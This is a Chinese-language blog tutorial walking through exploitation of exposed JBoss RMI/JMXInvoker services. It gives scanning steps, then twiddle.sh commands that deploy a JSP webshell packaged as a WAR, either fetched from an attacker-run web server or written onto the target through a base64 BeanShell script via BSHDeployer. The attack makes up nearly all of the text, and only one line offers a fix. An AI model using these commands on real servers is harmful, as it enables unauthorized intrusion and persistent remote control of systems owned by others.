JBoss远程方法调用漏洞利用详解
早上起床打开微博看到空虚浪子心大神发的一篇有关Jboss漏洞的文章,对我等菜鸟来说那边文章看起来还是很吃力的,所以查了查国内外的资料,翻译写了这边文章,记录一下。
在JBoss服务器上部署web应用程序,有很多不同的方式,诸如:JMX Console、Remote Method Invocation(RMI)、JMXInvokerServlet、HttpAdapter等。
本文主要是关于RMI远程方法调用漏洞的,其它几种部署方式比如JMX Console,也是会有漏洞的,主要看JBoss服务器的配置是否正确严谨。之前也有一篇关于JMX Console漏洞利用的。有兴趣可以在本站搜索一下,言归正传:
Metasploit有很多的模块针对不同的JBOSS漏洞,其中有 jboss_vulnscan模块,路径为:auxiliary/scanner/http/jboss_vulnscan, 通过该模块可以进行JBoss服务器漏洞扫描,可以探测是否有开放4444,1098,1099端口。当然也可以使用Nmap批量扫描某个网段是否有开放1099,1098或4444端口。如下:
1
2
3
4
5
6
7
8
9
|
[+] 192.168.0.35:443 /invoker/JMXInvokerServlet does not require authentication (200) [*] 192.168.0.35:443 Checking services... [*] 192.168.0.35:443 Naming Service tcp/1098: open [*] 192.168.0.35:443 Naming Service tcp/1099: open [*] 192.168.0.35:443 RMI invoker tcp/4444: open |
可以看到RMI默认端口4444是开启的,JNDI(Java Naming and Directory Interface)默认端口也是1098,1099也是开启的。有关JNDI的解释可以百度。
为了和远程目标JBoss服务器进行交互,需要在本地安装Jboss AS(如:JBoss – 4.2.3.GA ),使用其中bin目录下的twiddle和Jboss进行交互,在linux下使用用twiddle.sh,在windows下使用twiddle.bat,如下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
$ sh jboss-4.2.3.GA /bin/twiddle .sh -h A JMX client to ’twiddle’ with a remote JBoss server. usage: twiddle.sh [options] < command > [command_arguments] options: -h, --help Show this help message --help-commands Show a list of commands -H=< command > Show command specific help -c= command .properties Specify the command .properties file to use -D<name>[=<value>] Set a system property -- Stop procession options -s, --server=<url> The JNDI URL of the remote server -a, --adapter=<name> The JNDI name of the RMI adapter to user -u, --user=<name> Specify the username for authentication -p, --password=<name> Specify the password for authentication -q, --quiet Be somewhat more quiet |
获取远程目标JBoss服务器的系统信息,用如下命令:
1
2
3
4
5
|
root@bt: /pentest/web/jboss/jboss-4 .2.1.GA /bin # ./twiddle.sh -s 192.168.0.35 get "jboss.system:type=ServerInfo" HostAddress=192.168.0.35 ...... JavaVersion=1.5.0_13 MaxMemory=266600448 |
为了获取更高的权限,可以给JBoss服务器部署我们的webshell,创建一个war文件,可以使用Myeclipse来构建一个包含webshell的war,方法如下:
1、打开Myeclipse新建Web项目
2、把jsp放到WebRoot目录下
3、导出项目为war文件
构建好包含webshell的war之后,可以使用twiddle将该war部署的目标jboss服务器上,首先需要将war放到一个web服务器,可以使用twistd快速搭建一个web,如下:
1
2
3
4
5
|
root@bt: /pentest/web/jboss/fns # ls getshell.war root@bt: /pentest/web/jboss/fns # twistd -n --path=. --port=80 |
部署war到Jboss服务器,命令如下:
1
|
root@bt: /pentest/web/jboss/jboss-4 .2.1.GA /bin # ./twiddle.sh -s 192.168.0.35 invoke "jboss.system:service=MainDeployer" deploy http://10.0.1.50/getshell.war |
执行之后就会在jboss服务器上部署好我们的webshell,路径为:
http://192.168.0.35/getshell/customize.jsp
以上是一个使用RMI远程方法调用漏洞入侵Jboss服务器的过程,以上的过程也是有前提条件的,最主要的是Jboss服务器需要允许访问远程的HTTP服务器,否则利用RMI是没有办法进行部署远程war到JBOSS服务器。
然而在很多配置中,防火墙不允许JBoss服务器对外发出连接请求,如果遇到有防火墙的这种情况,可以使用BSHDeployer在目标Jboss服务器上执行任意的Beanshell来部署webshell。
BeanShell是一种运行在JRE上的脚本语言,该语言支持常规的Java语法。可以很快写完,并且不需要编译,JBoss服务器中BSHDeployer可以部署BeanShell脚本,它会安装后自动执行。具体的步骤如下:
1,按照前文提到的方法,创建好包含jspshell的shell.war;
2,用linux下的base64命令生成shell.war的base64的表示,命令如下:
1
|
root@bt:~ #base64 -w 0 shell.war>>shell.war.base64 |
3,创建beanshell脚本,创建一个txt文档,无需任何换行符,保存以下内容到该txt:
1
|
import java.io.FileOutputStream; import sun.misc.BASE64Decoder; String val= "shell.war的base64表示" ; BASE64Decoder decoder = new BASE64Decoder(); byte[] byteval=decoder.decodeBuffer(val); FileOutputStream fs = new FileOutputStream( "/temp/shell.war" ); fs,write(byteval); fs.close(); |
其中val变量中是shell.war文件的base64表示,如果目标Jboss服务器是windows的话目录修改如:C:\WINDOWS\TEMP\shell.war,将txt重命名为:.bsh文件
4,使用前文中的bin/twiddle.sh工具将本地.bsh文件创建到远程jboss服务器上,命令如下:
1
|
$ . /jboss-4 .2.3.GA /bin/twiddle .sh -s 192.168.0.35 invoke jboss.deployer:service=BSHDeployer createScriptDeployment "‘cat deployer.bsh‘" deployer.bsh |
该命令执行完成之后会在远程Jboss服务器生成shell.war,目录为/temp/shell.war
5,然后继续使用twiddle.sh将Jboss服务器上的shell.war进行部署,命令如下:
1
|
$ . /jboss-4 .2.3.GA /bin/twiddle .sh -s 192.168.0.35 invoke jboss.system:service=MainDeployer deploy "/temp/shell.war" |
目标Jboss服务器为windows的话命令如下:
1
|
$. /jboss-4 .2.3.GA /bin/twiddle .sh -s 192.168.0.35 invoke jboss.system:service=MainDeployer deploy "file:C:/WINDOWS/TEMP/shell.war" |
这样就会就会将shell.war部署在目标jboss服务器上,其中有我们的jspshell,接下来你们懂的!
Jboss远程方法调用漏洞修复建议引用空虚浪子心大婶的文章内容:
把invoker删除了,再把1099关闭就好。
PS:本文由阿德马童鞋翻译查找总结,转载请注明出处,TKS!有部分不准确的地方也欢迎拍砖。